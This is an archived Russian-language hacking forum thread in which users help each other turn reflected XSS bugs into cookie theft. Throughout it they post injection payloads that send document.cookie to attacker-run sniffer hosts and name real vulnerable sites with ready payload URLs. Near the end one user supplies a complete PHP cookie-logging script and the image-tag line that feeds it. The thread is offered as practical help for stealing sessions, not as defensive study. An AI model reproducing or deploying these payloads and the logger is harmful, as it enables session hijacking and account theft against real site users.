xSs как отправить кукисы на [Архив]

Просмотр полной версии : xSs как отправить кукисы на

Chakir

16.02.2007, 21:13

пробую так!
ssss"><script>alert('xss')</script>
всё ок выкибывает исправно!
пробую так
ssss"><script>alert(document.cookie)</script>
всё ок кидает куки!
пробуё так
ssss"><script>img = new Image(); img.src = "http://www.klub.h10.ru/snif/s.php?"+document.cookie;</script>
не канает!

как отправить кукисы на http://www.klub.h10.ru/snif/s.php

Robin_Hood

16.02.2007, 21:26

скорее всего стоит ограничение на длину строки

Abra

16.02.2007, 21:37

Исходный код смотри - что в нем получается.

Dagon

16.02.2007, 22:03

попробуй так "><script src=http://site.com/js.js></script>

в js.js - img=new Image();img.src="http://sniffer.ru/s.gif?"+document.cookie;

o3,14um

16.02.2007, 23:24

дай линк на сайт.
очень часто нужно писать +escape(document.cookie);

ya_mag

17.02.2007, 00:39

может и мне кто поможет? нашол вот такой xss
<meta http-equiv=Refresh content=0;url=javascript:alert("OK")>
пишеш
<meta http-equiv=Refresh content=0;url=javascript:document.cookie> показывает куки...
делаю ссылку на фаил js.js на снифер ничего не приходит :(
ссылку делаю вот так
<meta http-equiv=Refresh content=0;url=javascript:http://my_site/js.js>
и вот так вот пробывал
<meta http-equiv=Refresh content=0;url=javascript:new Image();img.src="http://my_site/s.gif?"+document.cookie;>
может я неправильно ссылку ставлю?

GreenBear

17.02.2007, 00:44

без javascript в url
и на хтмл страницу со скриптом

ya_mag

17.02.2007, 01:25

без javascript в url
без javascript просто открыват внутренность того чтонаписанно в js.js

Chakir

17.02.2007, 15:11

народ вот xss на апорт.ру а как сделать чтобы она кукисы на http://www.klub.h10.ru/snif/s.php отсылала? логи смотреть тут http://www.klub.h10.ru/snif/log.php
помогите кто поможет таму +
кому помог я тот мне + =)
http://sm.aport.ru/scripts/template.dll?That=std&r=%22%3E%3Cscript%3Ealert%28%27XSS_by_Chakir%27%29 %3C%2Fscript%3E

VampiRUS

24.02.2007, 09:00

подскажте как провести xss, если все что идёт после "/" режется?

Sharky

25.02.2007, 18:50

Попробуй заменить " на '

iSvt

19.02.2009, 19:11

у меня ребят вопрос нашел вот
http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.cookie)</script>
А как сделать чтобы куки пришли мне ведь ни один сниффер-то не пашет na-s.ru прикрыли
может кто напишет сниф

iddqd

19.02.2009, 19:16

http://kanick.ru/sniffer/

iSvt

19.02.2009, 20:35

смотрел но что-то не работает я паблик версию юзал
может пример какой-то даст

попугай

20.02.2009, 00:29

Вот .. создаешь файл i.php на своем хосте пишешь туда

<?php
if(isset($_GET[1])){
$fp = fopen("log.html", "a+");
fwrite($fp, '<h1>'.date('H:i:s d F Y').'</h1>'."\r\n".'<textarea rows=40 cols=150>'.$_GET[1].'</textarea><br><br>' . "\r\n");
fclose($fp);
}
?>

там же создаешь файл log.html и права 777 ставишь...

А юзать так

<script>var d=document; d.write('<img width=0 src=http://evilxakersait.com/i.php?1='+escape(d.cookie)+'>')</script>

http://evilxakersait.com твой сайт куда ты зальешь свой сниффер ...

вот что то в этом роде

Fepsis

20.02.2009, 00:42

Юзаю вот этот снифер http://web-defence.ru/snif/